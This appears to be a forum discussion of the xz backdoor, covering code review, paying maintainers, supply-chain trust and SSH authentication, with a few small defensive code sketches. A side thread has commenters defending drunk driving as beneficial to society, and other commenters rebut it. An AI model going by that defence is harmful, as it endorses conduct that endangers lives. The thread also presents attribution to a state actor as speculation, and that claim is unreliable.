When you're taking a walk on a forest road, any car that comes your way could just run you over. Chances are the driver would never get caught. There is nothing you can do to protect yourself against it. Police aren't around to help you. This horror scenario, much worse than a software backdoor, is actually the minimum viable danger that you need to accept in order to be able to do anything at all. And yes, sometimes it does really happen.
But at the end of the day, the vast majority of people just don't seek to actively harm others. Everything humans do relies on that assumption, and always has. The fantasy that if code review was just a little tighter, if more linters, CI mechanisms, and pattern matching were employed, if code signing was more widespread, if we verified people's identities etc., if all these things were implemented, then such scenarios could be prevented, that fantasy is the real problem. It's symptomatic of the insane Silicon Valley vision that the world can and should be managed and controlled at every level of detail. Which is a "cure" that would be much worse than any disease it could possibly prevent.
> When you're taking a walk on a forest road, any car that comes your way could just run you over. Chances are the driver would never get caught. There is nothing you can do to protect yourself against it.
Sure you can. You can be more vigilant and careful when walking near traffic. So maybe don't have headphones on, and engage all your senses on the immediate threats around you. This won't guarantee that a car won't run you over, but it reduces the chances considerably to where you can possibly avoid it.
The same can be said about the xz situation. All the linters, CI checks and code reviews couldn't guarantee that this wouldn't happen, but they sure would lower the chances that it does. Having a defeatist attitude that nothing could be done to prevent it, and that therefore all these development practices are useless, is not helpful for when this happens again.
The major problem with the xz case was the fact it had 2 maintainers, one who was mostly absent, and the other who gradually gained control over the project and introduced the malicious code. No automated checks could've helped in this case, when there were no code reviews, and no oversight over what gets merged at all. But had there been some oversight and thorough review from at least one other developer, then the chances of this happening would be lower.
It's important to talk about probabilities here instead of absolute prevention, since it's possible that even in the strictest of environments, with many active contributors, malicious code could still theoretically be merged in. But without any of it, this approaches 100% (minus the probability of someone acting maliciously to begin with, having their account taken over, etc.).
It's not defeatist to admit and accept that some things are ultimately out of our control. And more importantly, that any attempt to increase control over them comes with downsides.
An open source project that imposes all kinds of restrictions and complex bureaucratic checks before anything can get merged, is a project I wouldn't want to participate in. I imagine many others might feel the same. So perhaps the loss from such measures would be greater than the gain. Without people willing to contribute their time, open source cannot function.
> It's not defeatist to admit and accept that some things are ultimately out of our control.
But that's the thing: deciding how software is built and which features are shipped to users _is_ under our control. The case with xz was exceptionally bad because of the state of the project, but in a well maintained project having these checks and oversight does help with delivering better quality software. I'm not saying that this type of sophisticated attack could've been prevented even if the project was well maintained, but this doesn't mean that there's nothing we can do about it.
> And more importantly, that any attempt to increase control over them comes with downsides.
That's a subjective opinion. I personally find linters and code reviews essential to software development, and if you think of them as being restrictions or useless bureaucratic processes that prevent you from contributing to a project then you're entitled to your opinion, but I disagree. The downsides you mention are simply minimum contribution requirements, and not having any at all would ultimately become a burden on everybody, lead to a chaotic SDLC, and to more issues being shipped to users. I don't have any empirical evidence to back this up, so this is also "just" my opinion based on working on projects with well-defined guidelines.
I'm sure you would agree with the Optimistic Merging methodology[1]. I'd be curious to know whether this has any tangible benefits as claimed by its proponents. At first glance, a project like https://github.com/zeromq/libzmq doesn't appear to have a more vibrant community than a project of comparable size and popularity like https://github.com/NixOS/nix, while the latter uses the criticized "Pessimistic Merging" methodology. Perhaps I'm looking at the wrong signals, but I'm not able to see a clear advantage of OM, while I can see clear disadvantages of it.
libzmq does have contribution guidelines[2], but a code review process is unspecified (even though it mentions having "systematic reviews"), and there are no testing requirements besides patches being required to "pass project self-tests". Who conducts reviews and when, or who works on tests is entirely unclear, though the project seems to have 75% coverage, so someone must be doing this. I'm not sure whether all of this makes contributors happier, but I sure wouldn't like to work on a project where this is unclear.
> Without people willing to contribute their time, open source cannot function.
Agreed, but I would argue that no project, open source or otherwise, can function without contribution guidelines that maintain certain quality standards.
> But that's the thing: deciding how software is built and which features are shipped to users _is_ under our control. The case with xz was exceptionally bad because of the state of the project, but in a well maintained project having these checks and oversight does help with delivering better quality software. I'm not saying that this type of sophisticated attack could've been prevented even if the project was well maintained, but this doesn't mean that there's nothing we can do about it.
In this particular case, having a static project or a single maintainer rarely releasing updates would actually be an improvement! The people/sockpuppets calling for more/faster changes to xz and more maintainers to handle that is exactly how we ended up with a malicious maintainer in charge in the first place. And assuming no CVEs or external breaking changes occur, why does that particular library need to change?
Honestly, this is why I think we should pay people for open source projects. It's a tragedy-of-the-commons issue: all of us benefit a lot from this free software, which is built for free. Pay doesn't fix the problems directly, but it does decrease the risk. Pay means people can work on these projects full time instead of on the side. Pay means it's harder to bribe someone. Pay also makes contributors feel better, more like their work is meaningful. Importantly, pay signals to these people that we care about them. I think big tech should pay; we know they'll pass the costs on to us anyway. I'd also be happy to pay taxes for it, but that's probably harder. I'm not sure what the best solution is, and this is clearly only a part of a much larger problem, but I think it is very important that we actually talk about how much value OSS has. If we're going to talk about how money represents the value of work, we can't just ignore how much value is generated from OSS and only talk about what's popular and well known. There is a ton of critical infrastructure, in every system you could think of (traditional engineering, politics, anything), that is unknown. We shouldn't just pay for things that are popular. We should definitely pay for things that are important. Maybe the conversation can be different when AI takes all the jobs (lol)
I get why, in principle, we should pay people for open source projects, but I guess it doesn't make much of a difference when it comes to vulnerabilities.
First off, there are a lot of ways to bring someone to "the dark side". Maybe it's blackmail. Maybe it's ideology ("the greater good"). Maybe it's just pumping their ego. Or maybe it's money, and not even that much; extra money is always helpful. There is a long history of people spying against their country or hacking for a variety of reasons, even when they had a job and a steady paycheck. You can't just pay people and expect them to be 100% honest for the rest of their life.
Second, most (known) vulnerabilities are not backdoors. As any software developer knows, it's easy to make mistakes. This also goes for vulnerabilities. Even as a paid software developer, you can definitely mess up a function (or method) and accidentally introduce an off-by-one vulnerability, or forget to properly validate inputs, or reuse a supposedly one-time cryptographic quantity.
I think it does make a difference when it comes to vulnerabilities and especially infiltrators. You're doing these things as a hobby. Outside of your real work. If it becomes too big for you it's hard to find help (exact case here). How do you pass on the torch when you want to retire?
I think money can help alleviate pressure from both your points. No one says that money makes people honest. But if it's a full-time job, you are less likely to just glance at a patch and say "lgtm". You make fewer mistakes when you're less stressed or tired. It's harder to be corrupted, because people would rather have a stable job and career than a one-time payout. Pay also makes it easier to trace.
Again, it's not a 100% solution. Nothing will be! But it's hard to argue that this wouldn't alleviate significant pressure.
The difference is that software backdoors can affect billions of people. That driver on the road can't affect too many without being caught.
In this case, had they been a bit more careful with performance, they could have affected millions of machines without being caught. There aren't many cases where a lone wolf can do so much damage outside of software.
>But at the end of the day, the vast majority of people just don't seek to actively harm others. Everything humans do relies on that assumption, and always has.
Wholeheartedly agree. Fundamentally, we all assume that people are operating with good will and establish trust with that as the foundation (granted to varying degrees depending on the culture, some are more trusting or skeptical than others).
It's also why building trust takes ages and destroying it only takes seconds, and why violations of trust at all are almost always scathing to our very soul.
We certainly can account for bad actors, and depending on what's at stake (eg: hijacking airliners) we do forego assuming good will. But taking that too far is a very uncomfortable world to live in, because it's counter to something very fundamental for humans and life.
> But at the end of the day, the vast majority of people just don't seek to actively harm others. Everything humans do relies on that assumption, and always has.
> It's symptomatic of the insane Silicon Valley vision that the world can and should be managed and controlled at every level of detail. Which is a "cure" that would be much worse than any disease it could possibly prevent.
My personal opinion is that if something is going to find a way to conduct itself in secret anyway (at high risk and cost) if it is banned, it is always better to just suck it up and permit it and regulate it in the open instead. Trafficked people are far easier to discover in an open market than a black one. Effects of anything (both positive and negative) are far easier to assess when the thing being assessed is legal.
Should we ban cash because it incentivizes mugging and pickpocketing and theft? (I've been the victim of pickpocketing. The most valuable thing they took was an irreplaceable military ID I carried (I was long since inactive)... Not the $25 in cash in my wallet at the time.) I mean, there would literally be far fewer muggings if no one carried cash. Is it thus the cash's "fault"?
Captain's Log: This entire branch of comments responding to OP is not helping advance humanity in any significant way. I would appreciate my statement of protest being noted by the alien archeologists who find these bits in the wreckage of my species.
I think the role of drunk driving as an oil that keeps society lubricated should not be understated.
Yes, drunk driving kills people and that's unacceptable. On the other hand, people going out to eat and drink with family, friends, and co-workers after work helps keep society functioning, and the police acknowledge this reality, which is why they don't arrest clearly drunk patrons coming out of restaurants to drive back home.
This is such a deeply American take that I can't help but laugh out loud. It's like going to a developing nation and saying that, while emissions from two stroke scooters kills people there's no alternative to get your life things done.
It certainly isn't just America, though we're probably the most infamous example.
I was in France for business once in the countryside (southern France), and the host took everyone (me, their employees, etc.) out to lunch. Far as I could tell it was just an everyday thing. Anyway, we drove about an hour to a nearby village and practically partied for a few hours. Wine flowed like a river. Then we drove back and we all got back to our work. So not only were we drunk driving, we were drunk working. Even Americans usually don't drink that hard; the French earned my respect that day, they know how to have a good time.
Also many times in Japan, I would invite a business client/supplier or a friend over for dinner at a sushi bar. It's not unusual for some to drive rather than take the train, and then of course go back home driving after having had lots of beer and sake.
Whether any of us like it or not, drunk driving is an oil that lubricates society.
Except they weren't irresponsible. We all drove back just fine, and we all went back to work just as competently as before like nothing happened.
It takes skill and maturity to have a good time but not so much that it would impair subsequent duties. The French demonstrated to me they have that down to a much finer degree than most of us have in America, so they have my respect.
This isn't to say Americans are immature, mind you. For every drunk driving incident you hear on the news, hundreds of thousands if not millions of Americans drive home drunk without harming anyone for their entire lives. What I will admit is Americans would still refrain from drinking so much during lunch when we still have a work day left ahead of us, that's something we can take lessons from the French on.
Life is short, so those who can have more happy hours without compromising their duties are the real winners.
As someone who knows people who died in a crash with a drunk driver, it is hard for me to accept your view. Certainly, at a bare minimum, the penalties for drunk driving that results in a fatality should be much harsher than they are now -- at that point there is hard empirical evidence that you cannot be trusted to have the "skill and maturity" necessary for driving -- but we can't even bring ourselves to do that, not even for repeat offenders.
Eventually I am optimistic that autonomous driving will solve the problem entirely, at least for those who are responsible drivers. In an era of widely available self-driving cars, if you choose to drive drunk, then that is an active choice, and no amount of "social lubrication" can excuse such degenerate behavior.
I think the real problem is that people are really poor at assessing risk. And I think we can make some headway there, educationally, and it might actually affect how people reason around drunk driving (or their friends, assuming they still have their faculties).
Let's take the example of driving home drunk without hurting anyone or having an accident. Suppose that (being optimistic) there's a 1% chance of an accident and a 0.1% chance of causing a fatality (including to self). Seems like an easy risk to take, right? But observe what happens if you drive home drunk 40 times:
A 99% chance of causing no accident each time, raised to the 40th power: 0.99^40 is roughly a 67% chance that none of those 40 trips results in an accident. 80 times? A 45% chance of no accident. Now you're talking about roughly a coin flip on whether you cause an accident (potentially a fatal one, we'll get to that) at all over 80 attempts. (I feel like that is optimistic.)
If I have a 99.9% chance of not killing someone when drunk-driving one time, after 80 times I have a 92% chance of not killing someone (that is, an 8% chance of killing someone). Again, this seems optimistic.
Try tweaking the numbers to a 2% chance of an accident and a 1.2% chance of causing a fatality.
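If it helps to see the compounding spelled out, here is a tiny sketch of the arithmetic above; the per-trip probabilities are the same illustrative guesses as in the comment, not real accident statistics:

```python
# Compounded risk over repeated independent events, using the illustrative
# per-trip probabilities from the comment above (not real statistics).
def prob_at_least_one(per_event_prob: float, trials: int) -> float:
    """P(the event happens at least once in `trials` independent attempts)."""
    return 1.0 - (1.0 - per_event_prob) ** trials

for p_accident, p_fatality in [(0.01, 0.001), (0.02, 0.012)]:
    for trips in (40, 80):
        print(f"p_accident={p_accident}, p_fatality={p_fatality}, trips={trips}: "
              f"accident risk {prob_at_least_one(p_accident, trips):.0%}, "
              f"fatality risk {prob_at_least_one(p_fatality, trips):.0%}")
```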
Anyway, my point is that people are really terrible at evaluating the whole "re-rolling the dice multiple times" angle, since a single hit is a HUGE, potentially life-changing loss.
(People are just as bad at evaluating success risk, as well, for similar reasons- a single large success is a potentially life-changing event)
I'm certainly not trying to understate the very real and very serious suffering that irresponsible drunk drivers can and do cause. If any of this came off like that then that was never my intention.
When it comes to understanding drunk driving and especially why it is de facto tolerated by society despite its significant problems, it's necessary to consider the motivators and both positive and negative results. Simply saying "they are all irresponsible and should stop" and such with a handwave isn't productive. After all, society wouldn't tolerate a significant problem if there wasn't a significant benefit to doing so.
One of the well known effects of alcohol is impaired judgment. You're expecting people with some level of impaired judgment to make correct judgment calls. Skill and maturity can help, but are not a solution to that fundamental problem.
Would you be okay with a surgeon operating on you in the afternoon drinking at lunch and working on you later while impaired? Is it okay for every person and job to be impaired, regardless of the responsibility of their situation? If not, why is operating a few thousand pound vehicle in public that can easily kill multiple people when used incorrectly okay?
If it's American to make counterarguments based on reason instead of ridicule, then hell, I'd much prefer to be an American than whatever the hell your judgmental buttocks is doing.
And no, there is currently no substitute for a legal removal of your repression so that you can, say, get on with some shagging. I would love to see a study trying to determine what percentage of humans have only come into existence because of a bit of "social lubrication"
You can laugh out loud all you want, but there are mandatory parking minimums for bars across the USA.
Yes, bars have parking lots, and a lot of spaces.
The intent is to *drive* there, drink and maybe eat, and leave in various states of drunkenness. Why else would the spacious parking lots be required?
What is more depressing is how we can acknowledge that reality and continue to do absolutely nothing to mitigate it but punish it, in many cases.
The more people practically need to drive, the more people will drunk drive and kill people, yet in so many cases we just sort of stop there and go "welp, guess that's just nature" instead of building viable alternatives. However, the other theoretical possibility is that if people didn't need to drive, they might end up drinking more.
Indeed, that "bias" is a vital mechanism that enables societies to function. Good luck getting people to live together if they look at passerbys thinking "there is a 0.34% chance that guy is a serial killer".
> What "cure" would you recommend?
Accepting that not every problem can, or needs to be, solved. Today's science/tech culture suffers from an almost cartoonish god complex seeking to manage humanity into a glorious data-driven future. That isn't going to happen, and we're better off for it. People will still die in the future, and they will still commit crimes. Tomorrow, I might be the victim, as I already have been in the past. But that doesn't mean I want the insane hyper-control that some of our so-called luminaries are pushing us towards to become reality.
The late author of ZeroMQ, Pieter Hintjens, advocated for a practice called Optimistic Merging[1], where contributions would be merged immediately, without reviewing the code or waiting for CI results. So your approach of having lax merging guidelines is not far off.
While I can see the merits this has in building a community of contributors who are happy to work on a project, I always felt that it opens the project to grow without a clear vision or direction, and ultimately places too much burden on maintainers to fix the contributions of others in order to bring them up to some common standard (which I surely expect any project to have, otherwise the mishmash of styles and testing practices would make working on the project decidedly not fun). It also delays the actual code review, which Pieter claimed does happen, to some unknown point in the future, when it may or may not be exhaustive, and when it's not clear who is actually responsible for conducting it or fixing any issues. It all sounds like a recipe for chaos where there is no control over what eventually gets shipped to users. But then again, I've never worked on ZeroMQ or another project that adopted these practices, so perhaps you or someone else here can comment on what the experience is like.
And then there's this issue of malicious code being shipped. This is actually brought up by a comment on that blog post[2], and Pieter describes exactly what happened in the xz case:
> Let's assume Mallory is patient and deceitful and acts like a valid contributor long enough to get control over a project, and then slowly builds in his/her backdoors. Then careful code review won't help you. Mallory simply has to gain enough trust to become a maintainer, which is a matter of how, not if.
And concludes that "the best defense [...] is size and diversity of the community".
Where I think he's wrong is that careful code review _can_ indeed reduce the chances of this happening. If all contributions are reviewed thoroughly, regardless of whether they're authored by a trusted or an external contributor, then strange behavior and commits that claim to do one thing but actually do another are more likely to be spotted sooner rather than later. While OM might lead to a greater community size and diversity, which I think is debatable considering how many projects have a thriving community of contributors while also having strict contribution guidelines, it doesn't address how or when a malicious patch would be caught. If nobody is in charge of reviewing code, there are no testing standards, and maintainers have additional work keeping some kind of control over the project's direction, how does this actually protect against this situation?
The problem with xz wasn't a small community; it was *no* community. A single malicious actor got control of the project, and there was little oversight from anyone else. The project's contribution guidelines weren't a factor in its community size, and this would've happened whether it used OM or not.
> The problem with xz wasn't a small community; it was no community. A single malicious actor got control of the project, and there was little oversight from anyone else.
So because of this a lot of other highly used software was importing and depending on unreviewed code. It's scary to think how common this is. The attack surface seems unmanageable. There need to be tighter policies around what dependencies are included, ensuring that they meet some kind of standard.
> There need to be tighter policies around what dependencies are included, ensuring that they meet some kind of standard.
This is why it's a good practice to minimize the number of dependencies, and add dependencies only when absolutely required. Taking this a step further, doing a cursory review of each dependency and checking the transitive dependencies it introduces is also beneficial. Of course, it's impractical to do this for the entire dependency tree, and at some point we have to trust that the projects we depend on follow this same methodology, but having a lax attitude about dependency management is part of the problem that caused the xz situation.
One thing that I think would improve this is a "maintenance score". A service would scan projects on GitHub and elsewhere, and assign a score to each project indicating how well maintained it is. It would take into account the number of contributors in the past N months, development activity, community size and interaction, etc. Projects could showcase this in a badge in their READMEs, and it could be integrated into package managers and IDEs, which could warn users when they add a dependency with a low maintenance score. Hopefully this would dissuade people from using poorly maintained projects and encourage them to use better maintained ones, or to avoid the dependency altogether. It would also encourage maintainers to improve their score, and there would be higher visibility of projects that are struggling but have a large user base, as potentially more vulnerable to this type of attack. And then we can work towards figuring out how to provide the help and resources they need to improve.
Does such a service/concept exist already? I think GitHub should introduce something like this, since they have all the data to power it.
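To make the idea concrete, here is a rough sketch of what such a scoring function might look like. The inputs, weights, and thresholds are made up for illustration; they are not any existing service's formula, and a determined actor could obviously game every one of these signals:

```python
from dataclasses import dataclass

@dataclass
class RepoStats:
    # Hypothetical inputs a scanner might collect for the trailing N months.
    active_maintainers: int      # people who merged or reviewed changes
    distinct_contributors: int   # people whose commits were accepted
    commits: int
    issues_closed: int
    reverse_dependencies: int    # how many other packages depend on this one

def maintenance_score(s: RepoStats) -> float:
    """Naive 0-100 score: more eyes and more activity is better, capped per signal."""
    score = 0.0
    score += min(s.active_maintainers, 5) * 10     # up to 50 points
    score += min(s.distinct_contributors, 10) * 2  # up to 20 points
    score += min(s.commits / 10, 15)               # up to 15 points
    score += min(s.issues_closed / 5, 15)          # up to 15 points
    return score

def risk_flag(s: RepoStats) -> bool:
    """Flag widely used but thinly maintained projects (the xz-like profile)."""
    return s.reverse_dependencies > 1000 and maintenance_score(s) < 40

stats = RepoStats(active_maintainers=1, distinct_contributors=2,
                  commits=30, issues_closed=5, reverse_dependencies=20000)
print(maintenance_score(stats), risk_flag(stats))  # low score, huge blast radius
```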
That's not an effective idea, for the same reason that lines of code is not a good measure of productivity. It's an easy measure to automate, but it's purely performative because it doesn't score the qualitative value of any of the maintenance work. At best it encourages you to use only popular projects, which is its own danger (a software monoculture is cheaper to attack), without actually resolving the danger: this attack is sophisticated and underhanded enough that it could be slipped through almost any code review.
One real issue is that xz's build system is so complicated that it's possible to slip things in, which is an indication that the traditional autoconf Linux build mechanism needs to be retired and banned from distros.
But even that's not enough, because an attack only needs to succeed once. The advice to minimize your dependencies is impractical in a lot of cases (clearly) and not fully in your control, as you may acquire a surprising dependency transitively. And updating your dependencies is a best practice which, in this case, is exactly what introduced the problem.
We need to focus on real ways to improve the supply chain. eg having repeatable idempotent builds with signed chain of trusts that are backed by real identities that can be prosecuted and burned. For example, it would be pretty effective counter incentive for talent if we could permanently ban this person from ever working on lots of projects. That’s typically how humans deal with members of a community who misbehave and we don’t have a good digital equivalent for software development. Of course that’s also dangerous as blackball environments tend to become weaponized.
> We need to focus on real ways to improve the supply chain. eg having repeatable idempotent builds with signed chain of trusts that are backed by real identities that can be prosecuted and burned.
So, either no open source development, because nobody will vouch to that degree for others, or absolutely no anonymity, and you'll have to worry about anything you provide, because if you screw up and introduce an RCE, all of a sudden you'll have a bunch of people and companies looking to say it was on purpose so they don't have to own up to any of their own poor practices that allowed it to actually be executed on?
You don't need vouching for anyone. mDL is going to be a mechanism to have a government authority vouch for your identity. Of course a state actor like this can forge the identity, but that forgery at least gives a starting point for the investigation to try to figure out who the individual is. There are other technical questions about how you verify that the identity really is tied in some real way to the user at the other end (e.g. not a stolen identity), but there are things coming that will help with that (i.e. authenticated chains of trust for hardware that can attest the identity was signed on the given key in person, and you require that attestation).
As for people accusing you of an intentional RCE, that may be a hypothetical scenario, but I doubt it's very real. Most people have a long history of good contributions and therefore have built up a reputation that would be compared against the reality on the ground. No one is accusing Lasse Collin of participating in this, even though arguably it could have been him all along for all anyone knows.
It doesn’t need to be perfect but directionally it probably helps more than it hurts.
All that being said, this clearly seems like a state actor which changes the calculus for any attempts like this since the funding and power is completely different than what most people have access to and likely we don’t have any really good countermeasures here beyond making it harder for obfuscated code to make it into repositories.
Your idea sounds nice in theory, but it's absolutely not worth the amount of effort. To put it in perspective, think about the xz case: how would any number of contributions have prevented the release artifact (the tar file) from being modified? Because other people would have used the tar file? Why? The only ones who use tarballs are the ones redistributing the code, and they will not audit it. The ones who could audit it would look at the version control repository, not at the tar files. In other words, your solution wouldn't even be effective at potentially discovering this issue.
The only thing that would effectively do this, is that people stop trusting build artifacts and instead use direct from public repositories packaging. You could figure out if someone maliciously modified the release artifact by comparing it against the tagged version, but at that point, why not just shallow clone the entire thing and be done.
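As a rough illustration of "comparing it against the tagged version", something like the following could flag files that exist only in a release tarball, or that differ from the tagged tree. The paths, repo directory, and tag are placeholders, and real projects often ship legitimate generated files (autotools output, man pages) that will show up in the diff, so this is a triage aid rather than a verdict:

```python
# Sketch: diff a release tarball against the output of `git archive <tag>`.
import hashlib, io, subprocess, tarfile

def hashes_from_tar(fileobj) -> dict[str, str]:
    """Map member path (minus the top-level prefix) to its SHA-256."""
    out = {}
    with tarfile.open(fileobj=fileobj) as tar:
        for m in tar.getmembers():
            if m.isfile():
                name = m.name.split("/", 1)[-1]  # drop "pkg-1.2.3/" or "x/" prefix
                out[name] = hashlib.sha256(tar.extractfile(m).read()).hexdigest()
    return out

release = hashes_from_tar(open("xz-5.6.1.tar", "rb"))  # placeholder path
archive = subprocess.run(
    ["git", "-C", "xz-repo", "archive", "--prefix=x/", "v5.6.1"],  # placeholder repo/tag
    check=True, capture_output=True).stdout
tagged = hashes_from_tar(io.BytesIO(archive))

for name, digest in sorted(release.items()):
    if name not in tagged:
        print("only in tarball:", name)
    elif tagged[name] != digest:
        print("differs from tag:", name)
```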
Even if you mandated two code reviewers per merge, the attacker can just have three fake personas backed by the same single human and use them to author and approve malware.
Also, in a more optimistic scenario without sockpuppets, it's unlikely that malicious and underhanded contributions will be caught by anyone that isn't a security researcher.
There's actually an art to writing code like that, but it's not impossible, and it will dodge cursory inspection. And it's possible to construct it in a way that preserves plausible deniability.
I'm not sure why my point is not getting across...
I'm not saying that these manual and automated checks make a project impervious to malicious actors. Successful attacks are always a possibility even in the strictest of environments.
What they do provide is a _chance reduction_ of these attacks being successful.
Just like following all the best security practices doesn't produce 100% secure software, neither does following best development practices prevent malicious code from being merged in. But this doesn't mean that it's OK to ignore these practices altogether, as they do have tangible benefits. I argue that projects that have them are better prepared against this type of attack than those that do not.
It never ceases to amaze me what great lengths companies go to around securing the perimeter of the network, while their engineering staff just routinely brew install casks or vi/emacs/vscode/etc extensions.
Rust is arguably the programming language and/or community with the most secure set of defaults, ones that are fairly impossible to get out of, but even at "you can't play games with pointers" levels of security-first, the most common/endorsed path for installing it (one that I take all the time, because I'm a complete hypocrite) is to curl the rustup install script and pipe it straight into sh.
And that's just one example; "yo dawg, curl this shit and pipe it to sh so you can RCE while you bikeshed someone's unsafe block" is just muscle memory for way too many of us at this point.
It's worse than that. build.rs is in no way sandboxed, which means you can inject all sorts of badness into downstream dependencies, not to mention do things like steal crypto keys from developers. It's really a sore spot for the Rust community (to be fair, they're not uniquely worse, but that's a pretty poor standard to shoot for).
> yo dawg curl this shit and pipe it to sh so you can RCE while you bike shed someone’s unsafe block
Ahhh this takes me back to... a month ago...[0]
At least the rustup script wraps everything in a main function so you won't run a partial command, but that still doesn't mean there aren't other dangers. I'm more surprised by how adamant people are that there's no problem. You can see elsewhere in the thread that piping the script could still (who knows!) pose a risk. Extra especially when you consider how trivial the fix is, especially when people are just copy-pasting the command anyways...
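One concrete version of a "trivial fix" (there are others): fetch the script, check it against a published digest if the project offers one over a separate channel, skim it, and only then run it. A hedged sketch; the URL and checksum below are placeholders, not real values, and the check only helps if the digest comes from somewhere other than the server serving the script:

```python
# Sketch of a curl|sh alternative: download, verify against a published
# checksum, inspect, and only then execute. URL and digest are placeholders.
import hashlib, subprocess, urllib.request

INSTALLER_URL = "https://example.com/install.sh"          # placeholder
EXPECTED_SHA256 = "0000...published-checksum-goes-here"   # placeholder

data = urllib.request.urlopen(INSTALLER_URL).read()
digest = hashlib.sha256(data).hexdigest()
if digest != EXPECTED_SHA256:
    raise SystemExit(f"checksum mismatch: got {digest}")

with open("install.sh", "wb") as fh:
    fh.write(data)

# Eyeball install.sh here (or at least skim it) before letting it run.
subprocess.run(["sh", "install.sh"], check=True)
```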
It never ceases to amaze me how resistant people are to very easily solvable problems.
To be honest, it was just a matter of time until we found out that our good-faith beliefs were being exploited.
Behaviors like "break fast and fix early" or "who wants to take over my project's ownership" just ask for trouble, and yet it's unthinkable to live without them, because open source is an unpaid labor of love for code.
Sad to see this happen, but I'm not surprised. I wish for better tools (also open source) to combat such bad actors.
Thanks to all the researchers out there who try to protect us all.
don't you think that something as simple as a CLA (contributor license agreement) would prevent this type of thing? of course it creates noise in the open source contribution funnel, but let's be honest: if you are dedicating yourself to something like contributing to oss, signing a CLA should not be something unrealistic.
That's stretching the traditional definition. Usually CLAs are solely focused on addressing the copyright conditions and intellectual property origin of the contributed changes. Maybe just "contributor agreement" or "contributor contract" would describe that.
What exactly is a CLA going to do to a CCP operative (as appears to be the case with xz)? Do you think the party is going to extradite one of their state sponsored hacking groups because they got caught trying to implement a backdoor?
Or do you think they don’t have the resources to fake an identity?
There was a link in this thread pointing to an analysis of commit times, and it kinda checks out. Adding some cultural and outside-world context, I can guess which alphabet this three-four-six-letter agency uses to spell its name, at least.
case closed. you are right... it could of course make things a bit more difficult for someone not backed by a state sponsor. but if that's the case, you are right.
- what other ones exist by this same team or similar teams?
- how many such teams are operating?
- how many such dependencies are vulnerable to such infiltration attacks? what is our industry’s attack surface for such covert operations?
I think making a graph of all major network services (apache httpd, postgres, mysql, nginx, openssh, dropbear ssh, haproxy, varnish, caddy, squid, postfix, etc) and all of their dependencies and all of the committers to all of those dependencies might be the first step in seeing which parts are the most high value and have attracted the least scrutiny.
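A toy version of that graph idea, with made-up data standing in for real distro metadata; a real version would be populated from package dependency fields and commit histories:

```python
# Toy sketch of the "which dependencies are high-value and low-scrutiny" graph.
# The data below is entirely made up for illustration.
deps = {
    "openssh": ["libcrypto", "zlib", "libsystemd"],
    "nginx":   ["libcrypto", "zlib", "pcre2"],
    "postfix": ["libcrypto", "zlib"],
    "libsystemd": ["liblzma", "zstd"],
}
maintainers = {"liblzma": 1, "zlib": 2, "libcrypto": 18,
               "pcre2": 3, "zstd": 6, "libsystemd": 30}

def transitive(pkg, seen=None):
    """Collect every library a package pulls in, directly or indirectly."""
    seen = seen if seen is not None else set()
    for d in deps.get(pkg, []):
        if d not in seen:
            seen.add(d)
            transitive(d, seen)
    return seen

reach = {}
for service in ("openssh", "nginx", "postfix"):
    for lib in transitive(service):
        reach[lib] = reach.get(lib, 0) + 1

# High reach plus few maintainers = the most attractive infiltration targets.
for lib, count in sorted(reach.items(), key=lambda kv: -kv[1]):
    print(f"{lib}: reached by {count} services, "
          f"{maintainers.get(lib, '?')} maintainer(s)")
```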
This can’t be the first time someone attempted this - this is just the first unsuccessful time. (Yes, I know about the attempted/discovered backdoor in the linux kernel - this is remote and is a horse of a different color).
Why did they decide to create a backdoor, instead of using a zeroday like everyone else?
Why did they implement a fully-featured backdoor and attempted to hide the way it is deployed, instead of deploying something innocent-looking that might as well be a bug if detected?
These must have been conscious decisions. The reasons might provide a hint what the goals might have been.
Presumably because other people can also utilize a "bug" that was created intentionally but looks inadvertent. This backdoor, however, is activated only by the private key the attacker holds, so it's airtight.
If they seemingly almost succeeded, how many others have already planted similar backdoors? Or was this actually just poking at things to see if it was possible to inject this sort of behaviour?
Wild guess, but it could be that whoever was behind this was highly motivated but didn't have the skill required to find zerodays and didn't have the connections required to buy them (and distrusted the come one come all marketplaces I assume must exist).
Also: Why did Debian apply patches to a service that runs as root (when those patches had been rejected upstream), for a second time, after such behavior has already led to a widely known vulnerability in Debian?
So this basically means to scan for this exploit remotely we'd need the private key of the attacker which we don't have. Only other option is to run detection scripts locally. Yikes.
One completely awful thing some scanners might choose to do is decide that if you're offering RSA auth (which most SSH servers are, and indeed the SecSH RFC says this is Mandatory To Implement) then you're "potentially vulnerable", which would encourage people to do password auth instead.
Unless we find that this problem has somehow infested a lot of real world systems that seems to me even worse than the time similar "experts" decided that it was best to demand people rotate their passwords every year or so thereby ensuring the real security is reduced while on paper you claim you improved it.
Have to admit I've never understood why password auth is considered so much worse than using a cert - surely a decent password (long, random, etc) is for all practical purposes unguessable, and so you're either using a private RSA key that no-one can guess, or a password that no-one can guess, and then what's the difference? With the added inconvenience of having to pass around a certificate if you want to log in to the same account from multiple sources.
One of the biggest differences is that if you're using password auth, and you are tricked into connecting to a malicious server, that server now has your plaintext password and can impersonate you to other servers.
If you use a different strong random password for every single server, this attack isn't a problem, but that adds a lot of management hassle compared to using a single private key. (It's also made more difficult by host key checking, but let's be honest, most of us don't diligently check the fingerprints every single time we get a mismatch warning.)
In contrast, if you use an SSH key, then a compromised server never actually gets a copy of your private key unless you explicitly copy it over. (If you have SSH agent forwarding turned on, then during the compromised connection, the server can run a "confused deputy" attack to authenticate other connections using your agent's identity. But it loses that ability when you disconnect.)
If a man in the middle relays a public key challenge, that will indeed result in a valid connection, but the connection will be encrypted such that only the endpoints (or those who possess a private key belonging to one of the endpoints) can read the resulting traffic. So the man in the middle is simply relaying an encrypted conversation and has no visibility into the decrypted contents.
The man in the middle can still perform denial of service, by dropping some or all of the traffic.
The man in the middle could substitute their own public key in place of one of the endpoint's public keys, but if each endpoint knows the other endpoint's key and is expecting that other key, then an unexpected substitute key will raise a red flag.
No, these schemes use the pub/private keys to setup symmetric crypto, so just passing it along does you no good because what follows is a bunch of stuff encrypted by a session key only the endpoints know.
If I am a server and have your public key in an authorized_keys file, I can just encrypt a random session key using that and only you will be able to decrypt it to finish setting up the session.
This is why passwords and asymmetric crypto are worlds apart in security guarantees.
> if you're using password auth, and you are tricked into connecting to a malicious server, that server now has your plaintext password and can impersonate you to other servers.
Why would the password be sent in plaintext instead of, say, sending a hash of the password calculated with a salt that is unique per SSH server? Or something even more cryptographically sound.
In fact, passwords in /etc/shadow already do have random salts, so why aren't these sent over to the SSH client so it can send a proper hash instead of the plaintext password?
If the hash permits a login then having a hash is essentially equivalent to having a password. The malicious user wouldn't be able to use it to sudo but they could deploy some other privilege escalation once logged in.
